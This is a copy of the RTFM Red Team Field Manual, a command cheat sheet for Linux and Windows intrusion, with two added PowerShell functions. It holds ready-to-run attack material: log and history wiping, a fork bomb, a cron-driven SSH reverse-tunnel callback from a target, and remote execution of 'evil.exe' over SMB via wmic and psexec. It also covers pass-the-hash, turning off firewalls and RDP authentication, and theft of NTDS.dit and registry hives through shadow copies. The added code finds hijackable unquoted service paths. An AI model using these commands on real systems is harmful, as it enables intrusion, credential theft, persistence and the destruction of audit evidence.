RTFM Red Team Field Manual V3


Modified without permission by 0E800 (3/2014)

RTFM. Copyright © 2013 by Ben Clark

All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.

ISBN-10: 1494295504
ISBN-13: 978-1494295509
Technical Editor: Joe Vest
Graphic: Joe Vest

Product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence
of a trademarked name, the author uses the names only in an editorial
fashion, with no intention of infringement of the trademark. Use of a term
in this book should not be regarded as affecting the validity of any
trademark or service mark.
The information in this book is distributed "as is". While every precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions, or for damages
resulting from the use of the information contained herein.

TABLE OF CONTENTS

*NIX ............... 4
WINDOWS ............ 14
NETWORKING ......... 34
TIPS AND TRICKS .... 42
TOOL SYNTAX ........ 50
WEB ................ 66
DATABASES .......... 72
PROGRAMMING ........ 76
WIRELESS ........... 84
REFERENCES ......... 94
INDEX .............. 95

Bonus Material added by 0E800

Nmap Cheat Sheet
Nmap Cheat Sheet 2
Wireshark Display Filters
Common Ports List
Google Cheat Sheet
Scapy
TCPDUMP
Python
Regular Expressions
SQL Server

INFOSEC MIND MAPS:

TCP/IP
VLAN
INFRASTRUCTURE TESTS
VOIP
PRACTICE LABS
WLAN
VM / LIVECD
HTML
PHP
WIFI
CSS
VPN
WEB APP
ISO 2
PCI DSS
NAT
QoS
IPv
BROWSER PLUGINS
VIRUS
IPv
WORMS

LINUX NETWORK COMMANDS
watch ss -tp                                    Network connections
netstat -ant                                    Tcp connections (-anu=udp)
netstat -tulpn                                  Connections with PIDs
lsof -i                                         Established connections
smb://ip/share                                  Access windows smb share
share user x.x.x.x c$                           Mount Windows share
smbclient -U user //ip/share                    SMB connect
ifconfig eth# ip/cidr                           Set IP and netmask
ifconfig eth0:1 ip/cidr                         Set virtual interface
route add default gw gw_ip                      Set GW
ifconfig eth# mtu [size]                        Change MTU size
export MAC=xx:XX:XX:XX:XX:XX                    Change MAC
ifconfig int hw ether MAC                       Change MAC
macchanger -m MAC int                           Backtrack MAC changer
iwlist int scan                                 Built-in wifi scanner
dig -x ip                                       Domain lookup for IP
host ip                                         Domain lookup for IP
host -t SRV _service._tcp.url.com               Domain SRV lookup
dig @ip domain -t AXFR                          DNS Zone Xfer
host -l domain namesvr                          DNS Zone Xfer
ip xfrm state list                              Print existing VPN keys
ip addr add ip/cidr dev eth0                    Adds 'hidden' interface (not shown by ifconfig)
cat /var/log/messages | grep DHCP               List DHCP assignments
tcpkill host ip and port port                   Block ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward        Turn on IP Forwarding
echo "nameserver x.x.x.x" >> /etc/resolv.conf   Add DNS Server

LINUX SYSTEM INFO
id                              Current username
w                               Logged on users
who -a                          User information
last -a                         Last users logged on
ps -ef                          Process listing (top)
df -h                           Disk usage (free)
uname -a                        Kernel version/CPU info
mount                           Mounted file systems
getent passwd                   Show list of users
export PATH=$PATH:/new/path     Add to PATH variable
kill pid                        Kills process with pid
cat /etc/issue                  Show OS info
cat /etc/*release*              Show OS version info
cat /proc/version               Show kernel info
rpm -qa                         Installed pkgs (Redhat)
rpm -ivh *.rpm                  Install RPM
dpkg --get-selections           Installed pkgs (Ubuntu)
dpkg -i *.deb                   Install DEB
pkginfo                         Installed pkgs (Solaris)
which tcsh/csh/ksh/bash         Show location of executable
chmod -x tcsh/csh/ksh           Disable shell, force bash

LINUX UTILITY COMMANDS
wget http://url -O url.txt -o /dev/null       Grab url
rdesktop ip                                   Remote Desktop to ip
scp /tmp/file user@x.x.x.x:/tmp/file          Put file
scp user@remoteip:/tmp/file /tmp/file         Get file
useradd -m user                               Add user
passwd user                                   Change user password
userdel -r user                               Remove user (rmuser on BSD)
script -a outfile                             Record shell : Ctrl-D stops
apropos subject                               Find related command
history                                       View users command history
!num                                          Executes line # in history

LINUX FILE COMMANDS
diff file1 file2                                        Compare files
rm -rf dir                                              Force delete of dir
shred -f -u file                                        Overwrite/delete file
touch -r ref_file file                                  Matches ref_file timestamp
touch -t YYYYMMDDhhmm file                              Set file timestamp
sudo fdisk -l                                           List connected drives
mount /dev/sda# /mnt/usbkey                             Mount USB key
md5sum -t file                                          Compute md5 hash
echo -n "str" | md5sum                                  Generate md5 hash
sha1sum file                                            SHA1 hash of file
sort -u                                                 Sort/show unique lines
grep -c "str" file                                      Count lines w/ "str"
tar cf file.tar files                                   Create .tar from files
tar xf file.tar                                         Extract .tar
tar czf file.tar.gz files                               Create .tar.gz
tar xzf file.tar.gz                                     Extract .tar.gz
tar cjf file.tar.bz2 files                              Create .tar.bz2
tar xjf file.tar.bz2                                    Extract .tar.bz2
gzip file                                               Compress/rename file
gzip -d file.gz                                         Decompress file.gz
upx -9 -o out.exe orig.exe                              UPX packs orig.exe
zip -r zipname.zip \Directory\*                         Create zip
dd skip=1000 count=2000 bs=1 if=file of=outfile         Cut block 1K-3K from file
split -b 9K file prefix                                 Split file into 9K chunks
awk 'sub("$","\r")' unix.txt > win.txt                  Win compatible txt file
find / -iname '*.pdf' -type f                           Find PDF files
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;   Search for setuid/setgid files
dos2unix file                                           Convert to *nix format
file file                                               Determine file type/info
chattr (+/-)i file                                      Set/Unset immutable bit

LINUX MISC COMMANDS
unset HISTFILE                                          Disable history logging
ssh user@ip arecord - | aplay -                         Record remote mic
gcc -o outfile myfile.c                                 Compile C,C++
init 6                                                  Reboot (0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"                   List of log files
grep 'href=' file | cut -d"/" -f3 | grep url | sort -u  Strip links in url.com
dd if=/dev/urandom of=file bs=3145728 count=1           Make random 3MB file

LINUX COVER YOUR TRACKS COMMANDS
echo "" > /var/log/auth.log                  Clear auth.log file
echo "" > ~/.bash_history                    Clear current user bash history
rm ~/.bash_history -rf                       Delete .bash_history file
history -c                                   Clear current session history
export HISTFILESIZE=0                        Set history max lines to 0
export HISTSIZE=0                            Set history max commands to 0
unset HISTFILE                               Disable history logging (need to logout to take effect)
kill -9 $$                                   Kills current session
ln /dev/null ~/.bash_history -sf             Permanently send all bash history commands to /dev/null

LINUX FILE SYSTEM STRUCTURE
/bin        User binaries
/boot       Boot-up related files
/dev        Interface for system devices
/etc        System configuration files
/home       Base directory for user files
/lib        Critical software libraries
/opt        Third party software
/proc       System and running programs
/root       Home directory of root user
/sbin       System administrator binaries
/tmp        Temporary files
/usr        Less critical files
/var        Variable system files

LINUX FILES
/etc/shadow                        Local users' hashes
/etc/passwd                        Local users
/etc/group                         Local groups
/etc/rc.d                          Startup services
/etc/init.d                        Service startup scripts
/etc/hosts                         Known hostnames and IPs
/etc/HOSTNAME                      Full hostname with domain
/etc/network/interfaces            Network configuration
/etc/profile                       System environment variables
/etc/apt/sources.list              Ubuntu sources list
/etc/resolv.conf                   Nameserver configuration
/home/user/.bash_history           Bash history (also /root/)
/usr/share/wireshark/manuf         Vendor-MAC lookup
~/.ssh/                            SSH keystore
/var/log                           System log files (most Linux)
/var/adm                           System log files (Unix)
/var/spool/cron                    List cron files
/var/log/apache/access.log         Apache connection log
/etc/fstab                         Static file system info

LINUX SCRIPTING
PING SWEEP
for x in {1..254..1};do ping -c 1 1.1.1.$x |grep "64 b" |cut -d" " -f4 |tr -d ':' >> ips.txt; done

AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254..1};do
host $range.$ip |grep "name pointer" |cut -d" " -f5
done

FORK BOMB (CREATES PROCESSES UNTIL SYSTEM "CRASHES")
:(){ :|:& };:

DNS REVERSE LOOKUP
for ip in {1..254..1}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done;

BANNING SCRIPT
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i 00:00:00:00:00:0a
else
echo "IP NOT BANNED: 192.168.1.$i"
echo "*****************************"
fi
i=`expr $i + 1`
done

SSH CALLBACK
Set up script in crontab to callback every X minutes. Highly recommend you
set up a generic user on red team computer (with no shell privs). Script
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
# script located on callback source computer (target)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
if [ "$COUNT" -gt 0 ]; then
# -N: no remote command, just hold the reverse tunnel open (blocks until killed)
ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
fi
done

IPTABLES
iptables-save -c > file                                   Dump iptables rules (with counters) to file
iptables-restore file                                     Restore iptables rules
iptables -L -v --line-numbers                             List all iptables rules with affected and line numbers
iptables -F                                               Flush all iptables rules
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP       Change default policy for packets that don't match any rule
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT   Allow established connections on INPUT
iptables -D INPUT rulenum                                 Delete inbound rule number rulenum
iptables -t raw -A PREROUTING -j NOTRACK                  Increase throughput by turning off statefulness (conntrack)
iptables -P INPUT DROP                                    Drop all packets

ALLOW SSH ON PORT 22 OUTBOUND
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

ALLOW ICMP OUTBOUND
iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT

PORT FORWARD
echo "1" > /proc/sys/net/ipv4/ip_forward
-OR- sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d pivotip --dport 443 --to-destination attackip:443
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT -s target_subnet_cidr -d attackip --dport 443 --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT
(POSTROUTING takes -o, the outgoing interface; -i is rejected in that chain)

ALLOW ONLY 1.1.1.0/24, PORTS 80,443 AND LOG DROPS TO /VAR/LOG/MESSAGES
iptables -A INPUT -s 1.1.1.0/24 -m state --state NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

UPDATE-RC.D
• Check/change startup services
service --status-all                       [+] Service starts at boot, [-] Service does not start
service service start                      Start a service
service service stop                       Stop a service
service service status                     Check status of a service
update-rc.d -f service remove              Remove a service start up cmd (-f if the /etc/init.d start up file exists)
update-rc.d service defaults               Add a start up service

CHKCONFIG
• Available in Linux distributions such as Red Hat Enterprise Linux (RHEL),
  CentOS and Oracle Enterprise Linux (OEL)
chkconfig --list                           List existing services and run status
chkconfig service --list                   Check single service status
chkconfig service on [--level 3]           Add service [optional to add level at which service runs]
chkconfig service off [--level 3]          Remove service
e.g. chkconfig iptables off

SCREEN (C-a = Control-a)
screen -S name                   Start new screen with name
screen -ls                       List running screens
screen -r name                   Attach to screen name
screen -S name -X cmd            Send cmd to screen name
C-a ?                            List keybindings (help)
C-a d                            Detach
C-a D D                          Detach and logout
C-a c                            Create new window
C-a C-a                          Switch to last active window
C-a ' num|name                   Switch to window num|name
C-a "                            See windows list and change
C-a k                            Kill current window
C-a S                            Split display horizontally
C-a |                            Split display vertically
C-a tab                          Jump to next display
C-a X                            Remove current region
C-a Q                            Remove all regions but current

X11
CAPTURE REMOTE X11 WINDOWS AND CONVERT TO JPG
xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

OPEN X11 STREAM VIEWING
xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP

TCPDUMP
CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE
tcpdump -i eth0 -XX -w out.pcap

CAPTURE HTTP TRAFFIC TO 2.2.2.2
tcpdump -i eth0 port 80 and dst 2.2.2.2

SHOW CONNECTIONS TO A SPECIFIC IP
tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24

PRINT ALL PING RESPONSES
tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'

CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
tcpdump -i eth0 -c 50 -tttt 'udp and port 53'

NATIVE KALI COMMANDS
WMIC EQUIVALENT
wmis -U DOMAIN\user%password //DC cmd.exe /c command

MOUNT SMB SHARE
# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp,domain=domain,rw

UPDATING KALI
apt-get update
apt-get upgrade

PFSENSE
pfSsh.php                                   pfSense Shell System
pfSsh.php playback enableallowallwan        Allow all inbound WAN connections (adds to visible rules in WAN rules)
pfSsh.php playback enablesshd               Enable ssh inbound/outbound
pfctl -sn                                   Show NAT rules
pfctl -sr                                   Show filter rules
pfctl -sa                                   Show all rules
viconfig                                    Edit config
rm /tmp/config.cache                        Remove cached (backup) config after editing the current running
/etc/rc.reload_all                          Reload entire config

SOLARIS
ifconfig -a                                  List of interfaces
netstat -in                                  List of interfaces
netstat -r                                   Route listing
ifconfig eth0 dhcp                           Start DHCP client
ifconfig eth0 plumb up ip netmask nmask      Set IP
route add default ip                         Set gateway
logins -p                                    List users w/out passwords
svcs -a                                      List all services w/ status
prstat -a                                    Process listing (top)
svcadm start ssh                             Start SSH service
inetadm -e telnet (-d for disable)           Enable telnet
prtconf | grep Memory                        Total physical memory
iostat -En                                   Hard disk size
showrev -c /usr/bin/bash                     Information on a binary
shutdown -i6 -g0 -y                          Restart system
dfmounts                                     List clients connected NFS
smc                                          Management GUI
snoop -d int -c pkt# -o results.pcap         Packet capture
/etc/vfstab                                  File system mount table
/var/adm/logging                             Login attempt log
/etc/default/*                               Default settings
/etc/system                                  Kernel modules & config
/var/adm/messages                            Syslog location
/etc/auto_*                                  Automounter config files
/etc/inet/ipnodes                            IPv4/IPv6 host file

WINDOWS VERSIONS
Windows NT 3.1 (All)                                                   NT 3.1
Windows NT 3.5 (All)                                                   NT 3.5
Windows NT 3.51 (All)                                                  NT 3.51
Windows NT 4.0 (All)                                                   NT 4.0
Windows 2000 (All)                                                     NT 5.0
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)               NT 5.1
Windows XP (64-bit, Pro 64-bit)                                        NT 5.2
Windows Server 2003 & R2 (Standard, Enterprise)                        NT 5.2
Windows Home Server                                                    NT 5.2
Windows Vista (Starter, Home, Basic, Home Premium, Business,
  Enterprise, Ultimate)                                                NT 6.0
Windows Server 2008 (Foundation, Standard, Enterprise)                 NT 6.0
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate)                   NT 6.1
Windows Server 2008 R2 (Foundation, Standard, Enterprise)              NT 6.1
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))                  NT 6.2
Windows Phone 8                                                        NT 6.2
Windows Server 2012 (Foundation, Essentials, Standard)                 NT 6.2

WINDOWS FILES
%SYSTEMROOT%                                         Typically C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts              DNS entries
%SYSTEMROOT%\System32\drivers\etc\networks           Network settings
%SYSTEMROOT%\system32\config\SAM                     User & password hashes
%SYSTEMROOT%\repair\SAM                              Backup copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM             Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt                Application Log
%WINDIR%\system32\config\SecEvent.Evt                Security Log
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\       Startup Location
%USERPROFILE%\Start Menu\Programs\Startup\           Startup Location
%SYSTEMROOT%\Prefetch                                Prefetch dir (EXE logs)

STARTUP DIRECTORIES
WINDOWS NT 6.1, 6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
WINDOWS NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
WINDOWS 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\Startup
WINDOWS NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

WINDOWS SYSTEM INFO COMMANDS
ver                                              Get OS version
sc query state=all                               Show services
tasklist /svc                                    Show processes & services
tasklist /m                                      Show all processes & DLLs
tasklist /S ip /v                                Remote process listing
taskkill /PID pid /F                             Force process to terminate
systeminfo /S ip /U domain\user /P Pwd           Remote system info
reg query \\ip\RegDomain\Key /v Value            Query remote registry, /s=all values
reg query HKLM /f password /t REG_SZ /s          Search registry for password
fsutil fsinfo drives                             List drives *must be admin
dir /a /s /b c:\*.pdf*                           Search for all PDFs
dir /a /b c:\windows\kb*                         Search for patches
findstr /si password *.txt *.xml *.xls           Search files for password
tree /F /A c:\ > tree.txt                        Directory listing of C:
reg save HKLM\Security security.hive             Save security hive to file
echo %USERNAME%                                  Current user

WINDOWS NET/DOMAIN COMMANDS
net view /domain                                      Hosts in current domain
net view /domain:domain                               Hosts in domain
net user /domain                                      All users in current domain
net user user pass /add                               Add user
net localgroup "Administrators" user /add             Add user to Administrators
net accounts /domain                                  Domain password policy
net localgroup "Administrators"                       List local Admins
net group /domain                                     List domain groups
net group "Domain Admins" /domain                     List users in Domain Admins
net group "Domain Controllers" /domain                List DCs for current domain
net share                                             Current SMB shares
net session | find / "\\"                             Active SMB sessions
net user user /ACTIVE:yes /domain                     Unlock domain user account
net user user "newpassword" /domain                   Change domain user password
net share share c:\share /GRANT:Everyone,FULL         Share folder

WINDOWS REMOTE COMMANDS
tasklist /S ip /v                                          Remote process listing
systeminfo /S ip /U domain\user /P Pwd                     Remote systeminfo
net share \\ip                                             Shares of remote computer
net use \\ip                                               Remote filesystem (IPC$)
net use z: \\ip\share password /user:DOMAIN\user           Map drive, specified credentials
reg add \\ip\regkey\value                                  Add registry key remotely
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto   Create a remote service (space after binpath= and start=)
xcopy /s \\ip\dir C:\local                                 Copy remote folder
shutdown /m \\ip /r /t 0 /f                                Remotely reboot machine

WINDOWS NETWORK COMMANDS
ipconfig /all                                              IP configuration
ipconfig /displaydns                                       Local DNS cache
netstat -ana                                               Open connections
netstat -anop tcp 1                                        Netstat loop
netstat -an | findstr LISTENING                            LISTENING ports
route print                                                Routing table
arp -a                                                     Known MACs (ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit   DNS Zone Xfer
nslookup -type=SRV _www._tcp.url.com                       Domain SRV lookup (_ldap, _kerberos, _sip)
tftp -I ip GET remotefile                                  TFTP file transfer
netsh wlan show profiles                                   Saved wireless profiles
netsh firewall set opmode disable                          Disable firewall (*Old)
netsh wlan export profile folder=. key=clear               Export wifi plaintext pwd
netsh interface ip show interfaces                         List interface IDs/MTUs
netsh interface ip set address local static ip nmask gw ID Set IP
netsh interface ip set dns local static ip                 Set DNS server
netsh interface ip set address local dhcp                  Set interface to use DHCP

WINDOWS UTILITY COMMANDS
type file                                             Display file contents
del path\*.* /a /s /q /f                              Forceably delete all files in path
find /I "str" filename                                Find "str"
command | find /c /v ""                               Line count of cmd output
at HH:MM file [args] (i.e. at 14:45 cmd /c)           Schedule file to run
runas /user:user "file [args]"                        Run file as user
shutdown /r /t 0                                      Restart now
tr -d '\15\32' < win.txt > unix.txt                   Removes CR & ^Z (*nix)
makecab file                                          Native compression
Wusa.exe /uninstall /kb:###                           Uninstall patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"   CLI Event Viewer
lusrmgr.msc                                           Local user manager
services.msc                                          Services control panel
taskmgr.exe                                           Task manager
secpol.msc                                            Security policy manager
eventvwr.msc                                          Event viewer

MISC. COMMANDS

LOCK WORKSTATION
rundll32.exe user32.dll,LockWorkStation

DISABLE WINDOWS FIREWALL
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

NATIVE WINDOWS PORT FORWARD (* MUST BE ADMIN)
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1

RE-ENABLE COMMAND PROMPT
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

PSEXEC
EXECUTE FIL E HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe

RUN REMOTE COMMAND WITH SPECIFIED HASH
psexec /accepteula \\ip -u Domain\user -p LM:NTLM cmd.exe /c dir
(Sysinternals psexec only takes a plaintext password; the LM:NTLM form needs a
pass-the-hash capable psexec such as the Metasploit psexec module or pth-winexe)

RUN REMOTE COMMAND AS SYSTEM
psexec /accepteula \\ip -s cmd.exe

TERMINAL SERVICES (RDP)

START RDP
1. Create regfile.reg file with the following lines in it:
   Windows Registry Editor Version 5.00
   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
   "fDenyTSConnections"=dword:00000000
2. reg import regfile.reg
3. net start "termservice"
4. sc config termservice start= auto
5. net start termservice
--OR--
6. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

DISABLE NETWORK LEVEL AUTHENTICATION / ADD FIREWALL EXCEPTION
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
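The START RDP, port change and NLA steps above folded into one PowerShell function. This is an added example, not code from the RTFM: the function name Enable-RdpAccess is ours, and it assumes an elevated PowerShell on Windows 8 / Server 2012 or later so the NetSecurity cmdlets (Enable-NetFirewallRule, New-NetFirewallRule) exist. The point it adds to the steps above is the firewall side: the built-in "Remote Desktop" rule group only matches 3389, so a moved port needs its own rule, and the port only takes effect after TermService restarts.

```powershell
# Added example (not from the RTFM). Run elevated. Enables RDP, optionally
# moves it to another port and switches NLA off, then opens the firewall for
# whichever port is in use and returns the effective settings for checking.
function Enable-RdpAccess {
    [CmdletBinding()]
    param(
        [int]$Port = 3389,        # e.g. 443 to ride along with HTTPS egress rules
        [switch]$DisableNla       # clear UserAuthentication so NLA is not required
    )
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = "$ts\WinStations\RDP-Tcp"

    # Same three values the reg add lines above set.
    Set-ItemProperty -Path $ts  -Name fDenyTSConnections -Value 0     -Type DWord
    Set-ItemProperty -Path $tcp -Name PortNumber         -Value $Port -Type DWord
    if ($DisableNla) {
        Set-ItemProperty -Path $tcp -Name UserAuthentication -Value 0 -Type DWord
    }

    # sc config termservice start= auto / net start termservice; the restart
    # is what makes a new PortNumber take effect.
    Set-Service -Name TermService -StartupType Automatic
    Restart-Service -Name TermService -Force

    if ($Port -eq 3389) {
        # Stock rule group covers the default port only.
        Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    } else {
        # Custom port: the stock group will not match, add an explicit allow.
        New-NetFirewallRule -DisplayName "RDP-$Port" -Direction Inbound `
            -Protocol TCP -LocalPort $Port -Action Allow | Out-Null
    }

    # Read the values back rather than trusting the writes.
    [PSCustomObject]@{
        DenyConnections = (Get-ItemProperty -Path $ts).fDenyTSConnections
        Port            = (Get-ItemProperty -Path $tcp).PortNumber
        NlaRequired     = (Get-ItemProperty -Path $tcp).UserAuthentication
        Service         = (Get-Service -Name TermService).Status
    }
}

# Example: RDP on 443 with NLA off, as in the TUNNEL / DISABLE NLA steps.
Enable-RdpAccess -Port 443 -DisableNla
```

Run it from a non-RDP channel (psexec, WMI, PS remoting): the Restart-Service call drops any RDP session you are currently in. On hosts older than Windows 8 / 2012 replace the two firewall cmdlets with the netsh firewall line above, which still only opens 3389.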

IMPORT A SCHEDULED TASK FROM AN "EXPORTED TASK" XML
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f

WMIC
wmic [alias] get /?                                       List all attributes
wmic [alias] call /?                                      Callable methods
wmic process list full                                    Process attributes
wmic startup list full                                    Startup items
wmic service list brief                                   Services
wmic ntdomain list                                        Domain and DC info
wmic qfe                                                  List all patches
wmic process call create "process_name"                   Execute process
wmic process where name="process" call terminate          Terminate process
wmic logicaldisk get description,name                     View logical shares
wmic cpu get DataWidth /format:list                       Display 32 | 64 bit

WMIC [ALIAS] [WHERE] [CLAUSE]
[alias]  == process, share, startup, service, nicconfig, useraccount, etc.
[where]  == where (name="cmd.exe"), where (parentprocessid!=[pid]), etc.
[clause] == list [full|brief], get [attrib1,attrib2], call [method], delete

EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"

UNINSTALL SOFTWARE
# Get software names
wmic product get name /value
wmic product where name="XXX" call uninstall /nointeractive

REMOTELY DETERMINE LOGGED IN USER
wmic /node:remotecomputer computersystem get username

PROCESS LISTING EVERY SECOND
wmic /node:machinename process list brief /every:1

START RDP
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

LIST NUMBER OF TIMES USER HAS LOGGED ON
wmic netlogin where (name like "%adm%") get numberoflogons

SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """
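The findstr chain above is a coarse filter: it drops any line containing a quote anywhere (so an unquoted exe with quoted arguments is missed), keeps auto-start services whose path has no space (not exploitable), and does not say where a payload would have to be planted. The PowerShell function below is an added example, not code from the RTFM; the name Get-UnquotedServicePath is ours. It applies the actual rule (the executable part of the path is unquoted and contains a space) and returns, for each hit, the paths Windows will probe before the real binary, which is what you need to test for a writable directory.

```powershell
# Added example (not from the RTFM). Lists services whose executable path is
# unquoted and contains spaces, the condition the wmic|findstr chain above
# approximates, and the hijack candidates Windows tries before the real exe.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        [switch]$All,                 # include Manual services, not just Auto
        [string]$ComputerName = '.'   # '.' = local host; same WMI call as wmic
    )

    Get-WmiObject -Class Win32_Service -ComputerName $ComputerName | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        if (-not $All -and $_.StartMode -ne 'Auto') { return }

        # A path that starts with a quote is safe regardless of its arguments.
        if ($path.TrimStart().StartsWith('"')) { return }

        # Executable part ends at the first ".exe"; the rest is arguments.
        $exe = $path
        $idx = $path.ToLower().IndexOf('.exe')
        if ($idx -ge 0) { $exe = $path.Substring(0, $idx + 4) }

        # Only a space inside the unquoted executable path is exploitable.
        if ($exe -notmatch ' ') { return }
        # %SystemRoot% is not writable without admin anyway (findstr /v C:\windows\\).
        if ($exe -like "$env:SystemRoot\*") { return }

        # CreateProcess probes "C:\Program.exe", "C:\Program Files\Vendor.exe",
        # ... before "C:\Program Files\Vendor App\svc.exe".
        $parts = $exe.Split(' ')
        $candidates = @()
        for ($i = 1; $i -lt $parts.Length; $i++) {
            $candidates += ($parts[0..($i - 1)] -join ' ') + '.exe'
        }

        [PSCustomObject]@{
            Name       = $_.Name
            StartMode  = $_.StartMode
            RunAs      = $_.StartName
            PathName   = $path
            Hijackable = $candidates
        }
    }
}

Get-UnquotedServicePath | Format-List
```

Feed the Hijackable list to an ACL check (icacls on each parent directory) to see which candidate path the current user can actually create; a hit running as LocalSystem with StartMode Auto is the case worth pursuing.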


VOLUME SHADOW COPY
1. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows > c:\temp\output.txt 2>&1"
   If any copies already exist then exfil, otherwise create using the
   following commands. Check output.txt for any errors
2. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: > C:\temp\output.txt 2>&1"
3. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy#\Windows\System32\config\SYSTEM C:\temp\system.hive > C:\temp\output.txt 2>&1"
4. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy#\Windows\NTDS\NTDS.dit C:\temp\ntds.dit > C:\temp\output.txt 2>&1"
